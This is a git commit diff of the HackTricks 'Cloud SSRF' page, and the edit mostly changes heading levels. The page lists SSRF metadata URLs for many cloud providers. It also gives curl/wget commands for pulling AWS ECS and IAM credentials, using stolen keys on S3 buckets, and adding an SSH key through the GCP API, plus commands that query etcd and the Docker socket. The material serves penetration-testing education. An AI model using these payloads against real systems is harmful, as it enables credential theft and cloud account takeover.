GitBook: [#3174] No subject
This commit is contained in:
parent
453d24f044
commit
ff681fc8fc
@ -1,4 +1,4 @@
|
||||
|
||||
# Cloud SSRF
|
||||
|
||||
<details>
|
||||
|
||||
@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
</details>
|
||||
|
||||
## AWS
|
||||
|
||||
# AWS
|
||||
### Abusing SSRF in AWS EC2 environment
|
||||
|
||||
## Abusing SSRF in AWS EC2 environment
|
||||
|
||||
### 169.254.169.254 - Metadata Address
|
||||
#### 169.254.169.254 - Metadata Address
|
||||
|
||||
**Metadata** of the basic virtual machines from AWS (called EC2) can be retrieved from the VM accessing the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).
|
||||
|
||||
@ -74,7 +73,7 @@ Another possible interesting place where you can find credentials is in[ http://
|
||||
|
||||
[**PACU**](https://github.com/RhinoSecurityLabs/pacu) can be used with the discovered credentials to find out your privileges and try to escalate privileges
|
||||
|
||||
## SSRF in AWS ECS (Container Service) credentials
|
||||
### SSRF in AWS ECS (Container Service) credentials
|
||||
|
||||
**ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**.
|
||||
|
||||
@ -86,7 +85,7 @@ You could be able to read it exploiting an **Path Traversal** to _file:///proc/s
|
||||
curl "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O -
|
||||
```
|
||||
|
||||
## SSRF URL for AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
|
||||
### SSRF URL for AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
|
||||
|
||||
We retrieve the `accountId` and `region` from the API.
|
||||
|
||||
@ -105,9 +104,11 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean
|
||||
|
||||
Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
|
||||
|
||||
# GCP <a href="#6440" id="6440"></a>
|
||||
## GCP <a href="#6440" id="6440"></a>
|
||||
|
||||
## SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
|
||||
You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).
|
||||
|
||||
### SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
|
||||
|
||||
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs:
|
||||
|
||||
@ -193,7 +194,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/
|
||||
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
|
||||
```
|
||||
|
||||
## Add an SSH key <a href="#3e24" id="3e24"></a>
|
||||
### Add an SSH key <a href="#3e24" id="3e24"></a>
|
||||
|
||||
Extract the token
|
||||
|
||||
@ -222,7 +223,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo
|
||||
--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
|
||||
```
|
||||
|
||||
# Digital Ocean <a href="#9f1f" id="9f1f"></a>
|
||||
## Digital Ocean <a href="#9f1f" id="9f1f"></a>
|
||||
|
||||
Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/)
|
||||
|
||||
@ -238,11 +239,11 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re
|
||||
curl http://169.254.169.254/metadata/v1.json | jq
|
||||
```
|
||||
|
||||
# Packetcloud <a href="#2af0" id="2af0"></a>
|
||||
## Packetcloud <a href="#2af0" id="2af0"></a>
|
||||
|
||||
Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
|
||||
|
||||
# Azure <a href="#cea8" id="cea8"></a>
|
||||
## Azure <a href="#cea8" id="cea8"></a>
|
||||
|
||||
Limited, maybe more exists? [`https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`](https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/)
|
||||
|
||||
@ -255,7 +256,7 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02
|
||||
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
|
||||
```
|
||||
|
||||
# OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
|
||||
## OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
|
||||
|
||||
(header required? unknown)
|
||||
|
||||
@ -263,7 +264,7 @@ http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/pu
|
||||
http://169.254.169.254/openstack
|
||||
```
|
||||
|
||||
# HP Helion <a href="#a8e0" id="a8e0"></a>
|
||||
## HP Helion <a href="#a8e0" id="a8e0"></a>
|
||||
|
||||
(header required? unknown)
|
||||
|
||||
@ -271,7 +272,7 @@ http://169.254.169.254/openstack
|
||||
http://169.254.169.254/2009-04-04/meta-data/
|
||||
```
|
||||
|
||||
# Oracle Cloud <a href="#a723" id="a723"></a>
|
||||
## Oracle Cloud <a href="#a723" id="a723"></a>
|
||||
|
||||
```
|
||||
http://192.0.0.192/latest/
|
||||
@ -280,7 +281,7 @@ http://192.0.0.192/latest/meta-data/
|
||||
http://192.0.0.192/latest/attributes/
|
||||
```
|
||||
|
||||
# Alibaba <a href="#51bd" id="51bd"></a>
|
||||
## Alibaba <a href="#51bd" id="51bd"></a>
|
||||
|
||||
```
|
||||
http://100.100.100.200/latest/meta-data/
|
||||
@ -288,7 +289,7 @@ http://100.100.100.200/latest/meta-data/instance-id
|
||||
http://100.100.100.200/latest/meta-data/image-id
|
||||
```
|
||||
|
||||
# Kubernetes ETCD <a href="#c80a" id="c80a"></a>
|
||||
## Kubernetes ETCD <a href="#c80a" id="c80a"></a>
|
||||
|
||||
Can contain API keys and internal ip and ports
|
||||
|
||||
@ -297,7 +298,7 @@ curl -L http://127.0.0.1:2379/version
|
||||
curl http://127.0.0.1:2379/v2/keys/?recursive=true
|
||||
```
|
||||
|
||||
# Docker <a href="#ac0b" id="ac0b"></a>
|
||||
## Docker <a href="#ac0b" id="ac0b"></a>
|
||||
|
||||
```
|
||||
http://127.0.0.1:2375/v1.24/containers/jsonSimple example
|
||||
@ -306,13 +307,12 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
|
||||
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
|
||||
```
|
||||
|
||||
# Rancher <a href="#8cb7" id="8cb7"></a>
|
||||
## Rancher <a href="#8cb7" id="8cb7"></a>
|
||||
|
||||
```
|
||||
curl http://rancher-metadata/<version>/<path>
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
@ -328,5 +328,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user